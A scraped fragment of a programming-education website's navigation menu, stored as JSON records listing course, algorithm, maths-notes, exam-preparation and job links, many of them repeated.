"text": "School LearningSchool ProgrammingMathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculusMaths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 NotesNCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionRD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionPhysics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 Notes" }, { "code": null, "e": 7942, "s": 7923, "text": "School Programming" }, { "code": null, "e": 8034, "s": 7942, "text": "MathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculus" }, { "code": null, "e": 8048, "s": 8034, "text": "Number System" }, { "code": null, "e": 8056, "s": 8048, "text": "Algebra" }, { "code": null, "e": 8069, "s": 8056, "text": "Trigonometry" }, { "code": null, "e": 8080, "s": 8069, "text": "Statistics" }, { "code": null, "e": 8092, "s": 8080, "text": "Probability" }, { "code": null, "e": 8101, "s": 8092, "text": "Geometry" }, { "code": null, "e": 8113, "s": 8101, "text": "Mensuration" }, { "code": null, "e": 8122, "s": 8113, "text": "Calculus" }, { "code": null, "e": 8215, "s": 8122, "text": "Maths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 Notes" }, { "code": null, "e": 8229, "s": 8215, "text": "Class 8 Notes" }, { "code": null, "e": 8243, "s": 8229, "text": "Class 9 Notes" }, { "code": null, "e": 8258, "s": 8243, "text": "Class 10 Notes" }, { "code": null, "e": 8273, "s": 8258, "text": "Class 11 Notes" }, { "code": null, "e": 8288, "s": 8273, "text": "Class 12 Notes" }, { "code": null, "e": 8417, "s": 8288, "text": "NCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths Solution" }, { "code": null, "e": 8440, "s": 8417, "text": "Class 8 Maths Solution" }, { "code": null, "e": 8463, "s": 8440, "text": "Class 9 Maths Solution" }, { "code": null, "e": 8487, "s": 8463, "text": "Class 10 Maths Solution" }, { "code": null, "e": 8511, "s": 8487, "text": "Class 11 Maths Solution" }, { "code": null, "e": 8535, "s": 8511, "text": "Class 12 Maths Solution" }, { "code": null, "e": 8668, "s": 8535, "text": "RD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths Solution" }, { "code": null, "e": 8691, "s": 8668, "text": "Class 8 Maths Solution" }, { "code": null, "e": 8714, "s": 8691, "text": "Class 9 Maths Solution" }, { "code": null, "e": 8738, "s": 8714, "text": "Class 10 Maths Solution" }, { "code": null, "e": 8762, "s": 8738, "text": "Class 11 Maths Solution" }, { "code": null, "e": 8786, "s": 8762, "text": "Class 12 Maths Solution" }, { "code": null, "e": 8867, "s": 8786, "text": "Physics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 Notes" }, { "code": null, "e": 8881, "s": 8867, "text": "Class 8 Notes" }, { "code": null, "e": 8895, "s": 8881, "text": "Class 9 Notes" }, { "code": null, "e": 8910, "s": 8895, "text": "Class 10 Notes" }, { "code": null, "e": 8925, "s": 8910, "text": "Class 11 Notes" }, { "code": null, "e": 9131, "s": 8925, "text": "CS Exams/PSUsISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer ExamUGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved Papers" }, { "code": null, "e": 9242, "s": 9131, 
"text": "ISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer Exam" }, { "code": null, "e": 9284, "s": 9242, "text": "ISRO CS Original Papers and Official Keys" }, { "code": null, "e": 9306, "s": 9284, "text": "ISRO CS Solved Papers" }, { "code": null, "e": 9351, "s": 9306, "text": "ISRO CS Syllabus for Scientist/Engineer Exam" }, { "code": null, "e": 9434, "s": 9351, "text": "UGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved Papers" }, { "code": null, "e": 9460, "s": 9434, "text": "UGC NET CS Notes Paper II" }, { "code": null, "e": 9487, "s": 9460, "text": "UGC NET CS Notes Paper III" }, { "code": null, "e": 9512, "s": 9487, "text": "UGC NET CS Solved Papers" }, { "code": null, "e": 9717, "s": 9512, "text": "StudentCampus Ambassador ProgramSchool Ambassador ProgramProjectGeek of the MonthCampus Geek of the MonthPlacement CourseCompetititve ProgrammingTestimonialsStudent ChapterGeek on the TopInternshipCareers" }, { "code": null, "e": 9743, "s": 9717, "text": "Campus Ambassador Program" }, { "code": null, "e": 9769, "s": 9743, "text": "School Ambassador Program" }, { "code": null, "e": 9777, "s": 9769, "text": "Project" }, { "code": null, "e": 9795, "s": 9777, "text": "Geek of the Month" }, { "code": null, "e": 9820, "s": 9795, "text": "Campus Geek of the Month" }, { "code": null, "e": 9837, "s": 9820, "text": "Placement Course" }, { "code": null, "e": 9862, "s": 9837, "text": "Competititve Programming" }, { "code": null, "e": 9875, "s": 9862, "text": "Testimonials" }, { "code": null, "e": 9891, "s": 9875, "text": "Student Chapter" }, { "code": null, "e": 9907, "s": 9891, "text": "Geek on the Top" }, { "code": null, "e": 9918, "s": 9907, "text": "Internship" }, { "code": null, "e": 9926, "s": 9918, "text": "Careers" }, { "code": null, "e": 9965, "s": 9926, "text": "JobsApply for JobsPost a JobJOB-A-THON" }, { "code": null, "e": 9980, "s": 9965, "text": "Apply for Jobs" }, { "code": null, "e": 9991, "s": 9980, "text": "Post a Job" }, { "code": null, "e": 10002, "s": 9991, "text": "JOB-A-THON" }, { "code": null, "e": 10284, "s": 10002, "text": "PracticeAll DSA ProblemsProblem of the DayInterview Series: Weekly ContestsBi-Wizard Coding: School ContestsContests and EventsPractice SDE SheetCurated DSA ListsLove Babbar SheetTop 50 Array ProblemsTop 50 String ProblemsTop 50 Tree ProblemsTop 50 Graph ProblemsTop 50 DP Problems" }, { "code": null, "e": 10301, "s": 10284, "text": "All DSA Problems" }, { "code": null, "e": 10320, "s": 10301, "text": "Problem of the Day" }, { "code": null, "e": 10354, "s": 10320, "text": "Interview Series: Weekly Contests" }, { "code": null, "e": 10388, "s": 10354, "text": "Bi-Wizard Coding: School Contests" }, { "code": null, "e": 10408, "s": 10388, "text": "Contests and Events" }, { "code": null, "e": 10427, "s": 10408, "text": "Practice SDE Sheet" }, { "code": null, "e": 10564, "s": 10427, "text": "Curated DSA ListsLove Babbar SheetTop 50 Array ProblemsTop 50 String ProblemsTop 50 Tree ProblemsTop 50 Graph ProblemsTop 50 DP Problems" }, { "code": null, "e": 10582, "s": 10564, "text": "Love Babbar Sheet" }, { "code": null, "e": 10604, "s": 10582, "text": "Top 50 Array Problems" }, { "code": null, "e": 10627, "s": 10604, "text": "Top 50 String Problems" }, { "code": null, "e": 10648, "s": 10627, "text": "Top 50 Tree Problems" }, { "code": null, "e": 10670, "s": 10648, "text": "Top 50 Graph Problems" }, { "code": null, "e": 10689, "s": 10670, "text": "Top 50 DP Problems" }, { "code": null, 
"e": 10960, "s": 10693, "text": "WriteCome write articles for us and get featuredPracticeLearn and code with the best industry expertsPremiumGet access to ad-free content, doubt assistance and more!JobsCome and find your dream job with usGeeks DigestQuizzesGeeks CampusGblog ArticlesIDECampus Mantri" }, { "code": null, "e": 10973, "s": 10960, "text": "Geeks Digest" }, { "code": null, "e": 10981, "s": 10973, "text": "Quizzes" }, { "code": null, "e": 10994, "s": 10981, "text": "Geeks Campus" }, { "code": null, "e": 11009, "s": 10994, "text": "Gblog Articles" }, { "code": null, "e": 11013, "s": 11009, "text": "IDE" }, { "code": null, "e": 11027, "s": 11013, "text": "Campus Mantri" }, { "code": null, "e": 11035, "s": 11027, "text": "Sign In" }, { "code": null, "e": 11043, "s": 11035, "text": "Sign In" }, { "code": null, "e": 11048, "s": 11043, "text": "Home" }, { "code": null, "e": 11061, "s": 11048, "text": "Saved Videos" }, { "code": null, "e": 11069, "s": 11061, "text": "Courses" }, { "code": null, "e": 15553, "s": 11069, "text": "\n\nFor Working Professionals\n \n\n\n\nLIVE\n \n\n\nDSA Live Classes\n\nSystem Design\n\nJava Backend Development\n\nFull Stack LIVE\n\nExplore More\n\n\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nSDE Theory\n\nMust-Do Coding Questions\n\nExplore More\n\n\nFor Students\n \n\n\n\nLIVE\n \n\n\nCompetitive Programming\n\nData Structures with C++\n\nData Science\n\nExplore More\n\n\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nCIP\n\nJAVA / Python / C++\n\nExplore More\n\n\nSchool Courses\n \n\n\nSchool Guide\n\nPython Programming\n\nLearn To Make Apps\n\nExplore more\n\n\nAlgorithms\n \n\n\nSearching Algorithms\n\nSorting Algorithms\n\nGraph Algorithms\n\nPattern Searching\n\nGeometric Algorithms\n\nMathematical\n\nBitwise Algorithms\n\nRandomized Algorithms\n\nGreedy Algorithms\n\nDynamic Programming\n\nDivide and Conquer\n\nBacktracking\n\nBranch and Bound\n\nAll Algorithms\n\n\nAnalysis of Algorithms\n \n\n\nAsymptotic Analysis\n\nWorst, Average and Best Cases\n\nAsymptotic Notations\n\nLittle o and little omega notations\n\nLower and Upper Bound Theory\n\nAnalysis of Loops\n\nSolving Recurrences\n\nAmortized Analysis\n\nWhat does 'Space Complexity' mean ?\n\nPseudo-polynomial Algorithms\n\nPolynomial Time Approximation Scheme\n\nA Time Complexity Question\n\n\nData Structures\n \n\n\nArrays\n\nLinked List\n\nStack\n\nQueue\n\nBinary Tree\n\nBinary Search Tree\n\nHeap\n\nHashing\n\nGraph\n\nAdvanced Data Structure\n\nMatrix\n\nStrings\n\nAll Data Structures\n\n\nInterview Corner\n \n\n\nCompany Preparation\n\nTop Topics\n\nPractice Company Questions\n\nInterview Experiences\n\nExperienced Interviews\n\nInternship Interviews\n\nCompetititve Programming\n\nDesign Patterns\n\nSystem Design Tutorial\n\nMultiple Choice Quizzes\n\n\nLanguages\n \n\n\nC\n\nC++\n\nJava\n\nPython\n\nC#\n\nJavaScript\n\njQuery\n\nSQL\n\nPHP\n\nScala\n\nPerl\n\nGo Language\n\nHTML\n\nCSS\n\nKotlin\n\n\nML & Data Science\n \n\n\nMachine Learning\n\nData Science\n\n\nCS Subjects\n \n\n\nMathematics\n\nOperating System\n\nDBMS\n\nComputer Networks\n\nComputer Organization and Architecture\n\nTheory of Computation\n\nCompiler Design\n\nDigital Logic\n\nSoftware Engineering\n\n\nGATE\n \n\n\nGATE Computer Science Notes\n\nLast Minute Notes\n\nGATE CS Solved Papers\n\nGATE CS Original Papers and Official Keys\n\nGATE 2021 Dates\n\nGATE CS 2021 Syllabus\n\nImportant Topics for GATE CS\n\n\nWeb Technologies\n 
\n\n\nHTML\n\nCSS\n\nJavaScript\n\nAngularJS\n\nReactJS\n\nNodeJS\n\nBootstrap\n\njQuery\n\nPHP\n\n\nSoftware Designs\n \n\n\nSoftware Design Patterns\n\nSystem Design Tutorial\n\n\nSchool Learning\n \n\n\nSchool Programming\n\n\nMathematics\n \n\n\nNumber System\n\nAlgebra\n\nTrigonometry\n\nStatistics\n\nProbability\n\nGeometry\n\nMensuration\n\nCalculus\n\n\nMaths Notes (Class 8-12)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n\nClass 12 Notes\n\n\nNCERT Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n\n\nRD Sharma Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n\n\nPhysics Notes (Class 8-11)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n\n\nCS Exams/PSUs\n \n\n\n\nISRO\n \n\n\nISRO CS Original Papers and Official Keys\n\nISRO CS Solved Papers\n\nISRO CS Syllabus for Scientist/Engineer Exam\n\n\nUGC NET\n \n\n\nUGC NET CS Notes Paper II\n\nUGC NET CS Notes Paper III\n\nUGC NET CS Solved Papers\n\n\nStudent\n \n\n\nCampus Ambassador Program\n\nSchool Ambassador Program\n\nProject\n\nGeek of the Month\n\nCampus Geek of the Month\n\nPlacement Course\n\nCompetititve Programming\n\nTestimonials\n\nStudent Chapter\n\nGeek on the Top\n\nInternship\n\nCareers\n\n\nCurated DSA Lists\n \n\n\nLove Babbar Sheet\n\nTop 50 Array Problems\n\nTop 50 String Problems\n\nTop 50 Tree Problems\n\nTop 50 Graph Problems\n\nTop 50 DP Problems\n\n\nTutorials\n \n\n\n\nJobs\n \n\n\nApply for Jobs\n\nPost a Job\n\nJOB-A-THON\n\n\nPractice\n \n\n\nAll DSA Problems\n\nProblem of the Day\n\nInterview Series: Weekly Contests\n\nBi-Wizard Coding: School Contests\n\nContests and Events\n\nPractice SDE Sheet\n" }, { "code": null, "e": 15607, "s": 15553, "text": "\nFor Working Professionals\n \n\n" }, { "code": null, "e": 15730, "s": 15607, "text": "\nLIVE\n \n\n\nDSA Live Classes\n\nSystem Design\n\nJava Backend Development\n\nFull Stack LIVE\n\nExplore More\n" }, { "code": null, "e": 15749, "s": 15730, "text": "\nDSA Live Classes\n" }, { "code": null, "e": 15765, "s": 15749, "text": "\nSystem Design\n" }, { "code": null, "e": 15792, "s": 15765, "text": "\nJava Backend Development\n" }, { "code": null, "e": 15810, "s": 15792, "text": "\nFull Stack LIVE\n" }, { "code": null, "e": 15825, "s": 15810, "text": "\nExplore More\n" }, { "code": null, "e": 15933, "s": 15825, "text": "\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nSDE Theory\n\nMust-Do Coding Questions\n\nExplore More\n" }, { "code": null, "e": 15951, "s": 15933, "text": "\nDSA- Self Paced\n" }, { "code": null, "e": 15964, "s": 15951, "text": "\nSDE Theory\n" }, { "code": null, "e": 15991, "s": 15964, "text": "\nMust-Do Coding Questions\n" }, { "code": null, "e": 16006, "s": 15991, "text": "\nExplore More\n" }, { "code": null, "e": 16047, "s": 16006, "text": "\nFor Students\n \n\n" }, { "code": null, "e": 16159, "s": 16047, "text": "\nLIVE\n \n\n\nCompetitive Programming\n\nData Structures with C++\n\nData Science\n\nExplore More\n" }, { "code": null, "e": 16185, "s": 16159, "text": "\nCompetitive Programming\n" }, { "code": null, "e": 16212, "s": 16185, "text": "\nData Structures with C++\n" }, { "code": null, "e": 16227, "s": 16212, "text": "\nData Science\n" }, { "code": null, "e": 16242, "s": 16227, "text": "\nExplore More\n" }, { "code": null, "e": 16338, "s": 16242, "text": "\nSelf-Paced\n \n\n\nDSA- Self 
Paced\n\nCIP\n\nJAVA / Python / C++\n\nExplore More\n" }, { "code": null, "e": 16356, "s": 16338, "text": "\nDSA- Self Paced\n" }, { "code": null, "e": 16362, "s": 16356, "text": "\nCIP\n" }, { "code": null, "e": 16384, "s": 16362, "text": "\nJAVA / Python / C++\n" }, { "code": null, "e": 16399, "s": 16384, "text": "\nExplore More\n" }, { "code": null, "e": 16510, "s": 16399, "text": "\nSchool Courses\n \n\n\nSchool Guide\n\nPython Programming\n\nLearn To Make Apps\n\nExplore more\n" }, { "code": null, "e": 16525, "s": 16510, "text": "\nSchool Guide\n" }, { "code": null, "e": 16546, "s": 16525, "text": "\nPython Programming\n" }, { "code": null, "e": 16567, "s": 16546, "text": "\nLearn To Make Apps\n" }, { "code": null, "e": 16582, "s": 16567, "text": "\nExplore more\n" }, { "code": null, "e": 16887, "s": 16582, "text": "\nAlgorithms\n \n\n\nSearching Algorithms\n\nSorting Algorithms\n\nGraph Algorithms\n\nPattern Searching\n\nGeometric Algorithms\n\nMathematical\n\nBitwise Algorithms\n\nRandomized Algorithms\n\nGreedy Algorithms\n\nDynamic Programming\n\nDivide and Conquer\n\nBacktracking\n\nBranch and Bound\n\nAll Algorithms\n" }, { "code": null, "e": 16910, "s": 16887, "text": "\nSearching Algorithms\n" }, { "code": null, "e": 16931, "s": 16910, "text": "\nSorting Algorithms\n" }, { "code": null, "e": 16950, "s": 16931, "text": "\nGraph Algorithms\n" }, { "code": null, "e": 16970, "s": 16950, "text": "\nPattern Searching\n" }, { "code": null, "e": 16993, "s": 16970, "text": "\nGeometric Algorithms\n" }, { "code": null, "e": 17008, "s": 16993, "text": "\nMathematical\n" }, { "code": null, "e": 17029, "s": 17008, "text": "\nBitwise Algorithms\n" }, { "code": null, "e": 17053, "s": 17029, "text": "\nRandomized Algorithms\n" }, { "code": null, "e": 17073, "s": 17053, "text": "\nGreedy Algorithms\n" }, { "code": null, "e": 17095, "s": 17073, "text": "\nDynamic Programming\n" }, { "code": null, "e": 17116, "s": 17095, "text": "\nDivide and Conquer\n" }, { "code": null, "e": 17131, "s": 17116, "text": "\nBacktracking\n" }, { "code": null, "e": 17150, "s": 17131, "text": "\nBranch and Bound\n" }, { "code": null, "e": 17167, "s": 17150, "text": "\nAll Algorithms\n" }, { "code": null, "e": 17552, "s": 17167, "text": "\nAnalysis of Algorithms\n \n\n\nAsymptotic Analysis\n\nWorst, Average and Best Cases\n\nAsymptotic Notations\n\nLittle o and little omega notations\n\nLower and Upper Bound Theory\n\nAnalysis of Loops\n\nSolving Recurrences\n\nAmortized Analysis\n\nWhat does 'Space Complexity' mean ?\n\nPseudo-polynomial Algorithms\n\nPolynomial Time Approximation Scheme\n\nA Time Complexity Question\n" }, { "code": null, "e": 17574, "s": 17552, "text": "\nAsymptotic Analysis\n" }, { "code": null, "e": 17606, "s": 17574, "text": "\nWorst, Average and Best Cases\n" }, { "code": null, "e": 17629, "s": 17606, "text": "\nAsymptotic Notations\n" }, { "code": null, "e": 17667, "s": 17629, "text": "\nLittle o and little omega notations\n" }, { "code": null, "e": 17698, "s": 17667, "text": "\nLower and Upper Bound Theory\n" }, { "code": null, "e": 17718, "s": 17698, "text": "\nAnalysis of Loops\n" }, { "code": null, "e": 17740, "s": 17718, "text": "\nSolving Recurrences\n" }, { "code": null, "e": 17761, "s": 17740, "text": "\nAmortized Analysis\n" }, { "code": null, "e": 17799, "s": 17761, "text": "\nWhat does 'Space Complexity' mean ?\n" }, { "code": null, "e": 17830, "s": 17799, "text": "\nPseudo-polynomial Algorithms\n" }, { "code": null, "e": 17869, "s": 17830, "text": "\nPolynomial Time Approximation 
Scheme\n" }, { "code": null, "e": 17898, "s": 17869, "text": "\nA Time Complexity Question\n" }, { "code": null, "e": 18095, "s": 17898, "text": "\nData Structures\n \n\n\nArrays\n\nLinked List\n\nStack\n\nQueue\n\nBinary Tree\n\nBinary Search Tree\n\nHeap\n\nHashing\n\nGraph\n\nAdvanced Data Structure\n\nMatrix\n\nStrings\n\nAll Data Structures\n" }, { "code": null, "e": 18104, "s": 18095, "text": "\nArrays\n" }, { "code": null, "e": 18118, "s": 18104, "text": "\nLinked List\n" }, { "code": null, "e": 18126, "s": 18118, "text": "\nStack\n" }, { "code": null, "e": 18134, "s": 18126, "text": "\nQueue\n" }, { "code": null, "e": 18148, "s": 18134, "text": "\nBinary Tree\n" }, { "code": null, "e": 18169, "s": 18148, "text": "\nBinary Search Tree\n" }, { "code": null, "e": 18176, "s": 18169, "text": "\nHeap\n" }, { "code": null, "e": 18186, "s": 18176, "text": "\nHashing\n" }, { "code": null, "e": 18194, "s": 18186, "text": "\nGraph\n" }, { "code": null, "e": 18220, "s": 18194, "text": "\nAdvanced Data Structure\n" }, { "code": null, "e": 18229, "s": 18220, "text": "\nMatrix\n" }, { "code": null, "e": 18239, "s": 18229, "text": "\nStrings\n" }, { "code": null, "e": 18261, "s": 18239, "text": "\nAll Data Structures\n" }, { "code": null, "e": 18529, "s": 18261, "text": "\nInterview Corner\n \n\n\nCompany Preparation\n\nTop Topics\n\nPractice Company Questions\n\nInterview Experiences\n\nExperienced Interviews\n\nInternship Interviews\n\nCompetititve Programming\n\nDesign Patterns\n\nSystem Design Tutorial\n\nMultiple Choice Quizzes\n" }, { "code": null, "e": 18551, "s": 18529, "text": "\nCompany Preparation\n" }, { "code": null, "e": 18564, "s": 18551, "text": "\nTop Topics\n" }, { "code": null, "e": 18593, "s": 18564, "text": "\nPractice Company Questions\n" }, { "code": null, "e": 18617, "s": 18593, "text": "\nInterview Experiences\n" }, { "code": null, "e": 18642, "s": 18617, "text": "\nExperienced Interviews\n" }, { "code": null, "e": 18666, "s": 18642, "text": "\nInternship Interviews\n" }, { "code": null, "e": 18693, "s": 18666, "text": "\nCompetititve Programming\n" }, { "code": null, "e": 18711, "s": 18693, "text": "\nDesign Patterns\n" }, { "code": null, "e": 18736, "s": 18711, "text": "\nSystem Design Tutorial\n" }, { "code": null, "e": 18762, "s": 18736, "text": "\nMultiple Choice Quizzes\n" }, { "code": null, "e": 18901, "s": 18762, "text": "\nLanguages\n \n\n\nC\n\nC++\n\nJava\n\nPython\n\nC#\n\nJavaScript\n\njQuery\n\nSQL\n\nPHP\n\nScala\n\nPerl\n\nGo Language\n\nHTML\n\nCSS\n\nKotlin\n" }, { "code": null, "e": 18905, "s": 18901, "text": "\nC\n" }, { "code": null, "e": 18911, "s": 18905, "text": "\nC++\n" }, { "code": null, "e": 18918, "s": 18911, "text": "\nJava\n" }, { "code": null, "e": 18927, "s": 18918, "text": "\nPython\n" }, { "code": null, "e": 18932, "s": 18927, "text": "\nC#\n" }, { "code": null, "e": 18945, "s": 18932, "text": "\nJavaScript\n" }, { "code": null, "e": 18954, "s": 18945, "text": "\njQuery\n" }, { "code": null, "e": 18960, "s": 18954, "text": "\nSQL\n" }, { "code": null, "e": 18966, "s": 18960, "text": "\nPHP\n" }, { "code": null, "e": 18974, "s": 18966, "text": "\nScala\n" }, { "code": null, "e": 18981, "s": 18974, "text": "\nPerl\n" }, { "code": null, "e": 18995, "s": 18981, "text": "\nGo Language\n" }, { "code": null, "e": 19002, "s": 18995, "text": "\nHTML\n" }, { "code": null, "e": 19008, "s": 19002, "text": "\nCSS\n" }, { "code": null, "e": 19017, "s": 19008, "text": "\nKotlin\n" }, { "code": null, "e": 19095, "s": 19017, "text": "\nML & Data Science\n 
\n\n\nMachine Learning\n\nData Science\n" }, { "code": null, "e": 19114, "s": 19095, "text": "\nMachine Learning\n" }, { "code": null, "e": 19129, "s": 19114, "text": "\nData Science\n" }, { "code": null, "e": 19342, "s": 19129, "text": "\nCS Subjects\n \n\n\nMathematics\n\nOperating System\n\nDBMS\n\nComputer Networks\n\nComputer Organization and Architecture\n\nTheory of Computation\n\nCompiler Design\n\nDigital Logic\n\nSoftware Engineering\n" }, { "code": null, "e": 19356, "s": 19342, "text": "\nMathematics\n" }, { "code": null, "e": 19375, "s": 19356, "text": "\nOperating System\n" }, { "code": null, "e": 19382, "s": 19375, "text": "\nDBMS\n" }, { "code": null, "e": 19402, "s": 19382, "text": "\nComputer Networks\n" }, { "code": null, "e": 19443, "s": 19402, "text": "\nComputer Organization and Architecture\n" }, { "code": null, "e": 19467, "s": 19443, "text": "\nTheory of Computation\n" }, { "code": null, "e": 19485, "s": 19467, "text": "\nCompiler Design\n" }, { "code": null, "e": 19501, "s": 19485, "text": "\nDigital Logic\n" }, { "code": null, "e": 19524, "s": 19501, "text": "\nSoftware Engineering\n" }, { "code": null, "e": 19741, "s": 19524, "text": "\nGATE\n \n\n\nGATE Computer Science Notes\n\nLast Minute Notes\n\nGATE CS Solved Papers\n\nGATE CS Original Papers and Official Keys\n\nGATE 2021 Dates\n\nGATE CS 2021 Syllabus\n\nImportant Topics for GATE CS\n" }, { "code": null, "e": 19771, "s": 19741, "text": "\nGATE Computer Science Notes\n" }, { "code": null, "e": 19791, "s": 19771, "text": "\nLast Minute Notes\n" }, { "code": null, "e": 19815, "s": 19791, "text": "\nGATE CS Solved Papers\n" }, { "code": null, "e": 19859, "s": 19815, "text": "\nGATE CS Original Papers and Official Keys\n" }, { "code": null, "e": 19877, "s": 19859, "text": "\nGATE 2021 Dates\n" }, { "code": null, "e": 19901, "s": 19877, "text": "\nGATE CS 2021 Syllabus\n" }, { "code": null, "e": 19932, "s": 19901, "text": "\nImportant Topics for GATE CS\n" }, { "code": null, "e": 20052, "s": 19932, "text": "\nWeb Technologies\n \n\n\nHTML\n\nCSS\n\nJavaScript\n\nAngularJS\n\nReactJS\n\nNodeJS\n\nBootstrap\n\njQuery\n\nPHP\n" }, { "code": null, "e": 20059, "s": 20052, "text": "\nHTML\n" }, { "code": null, "e": 20065, "s": 20059, "text": "\nCSS\n" }, { "code": null, "e": 20078, "s": 20065, "text": "\nJavaScript\n" }, { "code": null, "e": 20090, "s": 20078, "text": "\nAngularJS\n" }, { "code": null, "e": 20100, "s": 20090, "text": "\nReactJS\n" }, { "code": null, "e": 20109, "s": 20100, "text": "\nNodeJS\n" }, { "code": null, "e": 20121, "s": 20109, "text": "\nBootstrap\n" }, { "code": null, "e": 20130, "s": 20121, "text": "\njQuery\n" }, { "code": null, "e": 20136, "s": 20130, "text": "\nPHP\n" }, { "code": null, "e": 20231, "s": 20136, "text": "\nSoftware Designs\n \n\n\nSoftware Design Patterns\n\nSystem Design Tutorial\n" }, { "code": null, "e": 20258, "s": 20231, "text": "\nSoftware Design Patterns\n" }, { "code": null, "e": 20283, "s": 20258, "text": "\nSystem Design Tutorial\n" }, { "code": null, "e": 20347, "s": 20283, "text": "\nSchool Learning\n \n\n\nSchool Programming\n" }, { "code": null, "e": 20368, "s": 20347, "text": "\nSchool Programming\n" }, { "code": null, "e": 20504, "s": 20368, "text": "\nMathematics\n \n\n\nNumber System\n\nAlgebra\n\nTrigonometry\n\nStatistics\n\nProbability\n\nGeometry\n\nMensuration\n\nCalculus\n" }, { "code": null, "e": 20520, "s": 20504, "text": "\nNumber System\n" }, { "code": null, "e": 20530, "s": 20520, "text": "\nAlgebra\n" }, { "code": null, "e": 20545, "s": 
20530, "text": "\nTrigonometry\n" }, { "code": null, "e": 20558, "s": 20545, "text": "\nStatistics\n" }, { "code": null, "e": 20572, "s": 20558, "text": "\nProbability\n" }, { "code": null, "e": 20583, "s": 20572, "text": "\nGeometry\n" }, { "code": null, "e": 20597, "s": 20583, "text": "\nMensuration\n" }, { "code": null, "e": 20608, "s": 20597, "text": "\nCalculus\n" }, { "code": null, "e": 20739, "s": 20608, "text": "\nMaths Notes (Class 8-12)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n\nClass 12 Notes\n" }, { "code": null, "e": 20755, "s": 20739, "text": "\nClass 8 Notes\n" }, { "code": null, "e": 20771, "s": 20755, "text": "\nClass 9 Notes\n" }, { "code": null, "e": 20788, "s": 20771, "text": "\nClass 10 Notes\n" }, { "code": null, "e": 20805, "s": 20788, "text": "\nClass 11 Notes\n" }, { "code": null, "e": 20822, "s": 20805, "text": "\nClass 12 Notes\n" }, { "code": null, "e": 20989, "s": 20822, "text": "\nNCERT Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n" }, { "code": null, "e": 21014, "s": 20989, "text": "\nClass 8 Maths Solution\n" }, { "code": null, "e": 21039, "s": 21014, "text": "\nClass 9 Maths Solution\n" }, { "code": null, "e": 21065, "s": 21039, "text": "\nClass 10 Maths Solution\n" }, { "code": null, "e": 21091, "s": 21065, "text": "\nClass 11 Maths Solution\n" }, { "code": null, "e": 21117, "s": 21091, "text": "\nClass 12 Maths Solution\n" }, { "code": null, "e": 21288, "s": 21117, "text": "\nRD Sharma Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n" }, { "code": null, "e": 21313, "s": 21288, "text": "\nClass 8 Maths Solution\n" }, { "code": null, "e": 21338, "s": 21313, "text": "\nClass 9 Maths Solution\n" }, { "code": null, "e": 21364, "s": 21338, "text": "\nClass 10 Maths Solution\n" }, { "code": null, "e": 21390, "s": 21364, "text": "\nClass 11 Maths Solution\n" }, { "code": null, "e": 21416, "s": 21390, "text": "\nClass 12 Maths Solution\n" }, { "code": null, "e": 21533, "s": 21416, "text": "\nPhysics Notes (Class 8-11)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n" }, { "code": null, "e": 21549, "s": 21533, "text": "\nClass 8 Notes\n" }, { "code": null, "e": 21565, "s": 21549, "text": "\nClass 9 Notes\n" }, { "code": null, "e": 21582, "s": 21565, "text": "\nClass 10 Notes\n" }, { "code": null, "e": 21599, "s": 21582, "text": "\nClass 11 Notes\n" }, { "code": null, "e": 21641, "s": 21599, "text": "\nCS Exams/PSUs\n \n\n" }, { "code": null, "e": 21786, "s": 21641, "text": "\nISRO\n \n\n\nISRO CS Original Papers and Official Keys\n\nISRO CS Solved Papers\n\nISRO CS Syllabus for Scientist/Engineer Exam\n" }, { "code": null, "e": 21830, "s": 21786, "text": "\nISRO CS Original Papers and Official Keys\n" }, { "code": null, "e": 21854, "s": 21830, "text": "\nISRO CS Solved Papers\n" }, { "code": null, "e": 21901, "s": 21854, "text": "\nISRO CS Syllabus for Scientist/Engineer Exam\n" }, { "code": null, "e": 22018, "s": 21901, "text": "\nUGC NET\n \n\n\nUGC NET CS Notes Paper II\n\nUGC NET CS Notes Paper III\n\nUGC NET CS Solved Papers\n" }, { "code": null, "e": 22046, "s": 22018, "text": "\nUGC NET CS Notes Paper II\n" }, { "code": null, "e": 22075, "s": 22046, "text": "\nUGC NET CS Notes 